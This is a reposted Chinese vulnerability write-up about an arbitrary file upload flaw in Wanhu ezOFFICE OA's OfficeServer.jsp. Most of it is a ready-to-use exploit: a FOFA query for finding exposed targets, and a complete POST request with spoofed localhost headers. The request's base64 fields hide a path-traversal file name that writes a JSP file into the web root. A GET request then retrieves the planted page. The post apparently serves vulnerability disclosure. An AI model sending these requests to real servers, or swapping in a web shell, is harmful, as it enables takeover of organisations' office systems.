万户OA OfficeServer.jsp 任意文件上传漏洞

本文转载于公众号：融云攻防实验室，原文地址：

万户OA OfficeServer.jsp 任意文件上传漏洞

0x02 漏洞描述

万户软件网络是业内普遍认可的智慧政务办公专家,OA系统国家行业标准编制组长单位,协同软件国家行业标准编制组长单位,22年专注协同管理领域.为您提供定制化的智慧政务一体化办公解决方案。万户OAOfficeServer.jsp文件存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件至服务器，导致服务器失陷。

0x03 漏洞复现

fofa：app=”万户网络-ezOFFICE”

1.执行POC写入文件，返回200 ok

POST /defaultroot/public/iWebOfficeSign/OfficeServer.jsp HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Content-Length: 254
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cache-Control: no-cache
Connection: close
Cookie: OASESSIONID=847AE3A2E5D155AE7FB1CD2C6736CD66
Pragma: no-cache
Upgrade-Insecure-Requests: 1
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
x-remote-ip: 127.0.0.1

DBSTEP V3.0     170      01000      DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
RECORDID=
isDoc=dHJ1ZQ==
moduleType=Z292ZG9jdW1lbnQ=
FILETYPE=Li4vLi4vcHVibGljL2VkaXQvMHhvbGQuanNw
111111111111111111111111111111111111111111111111
<% out.println("0xold6");%>

2.访问默认链接/defaultroot/public/edit/0xold.jsp，得到上传内容

GET /defaultroot/public/edit/0xold.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: OASESSIONID=41BF8B6B48684EEA6F6C21063CD9F1D0; OASESSIONID=E1137A172F14D502B2DAEA127B19DC91; LocLan=zh_CN
Upgrade-Insecure-Requests: 1